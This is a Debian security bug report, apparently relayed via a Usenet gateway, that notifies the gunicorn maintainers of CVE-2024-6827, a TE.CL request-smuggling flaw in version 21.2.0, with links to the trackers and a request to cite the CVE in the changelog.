Source: gunicorn
X-Debbugs-CC:
team@security.debian.org
Severity: important
Tags: security
Hi,
The following vulnerability was published for gunicorn.
CVE-2024-6827[0]:
| Gunicorn version 21.2.0 does not properly validate the value of the
| 'Transfer-Encoding' header as specified in the RFC standards, which
| leads to the default fallback method of 'Content-Length,' making it
| vulnerable to TE.CL request smuggling. This vulnerability can lead
| to cache poisoning, data exposure, session manipulation, SSRF, XSS,
| DoS, data integrity compromise, security bypass, information
| leakage, and business logic abuse.
https://huntr.com/bounties/1b4f8f38-39da-44b6-9f98-f618639d0dd7
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0]
https://security-tracker.debian.org/tracker/CVE-2024-6827
https://www.cve.org/CVERecord?id=CVE-2024-6827
Please adjust the affected versions in the BTS as needed.
--- SoupGate-Win32 v1.05
* Origin: fsxNet Usenet Gateway (21:1/5)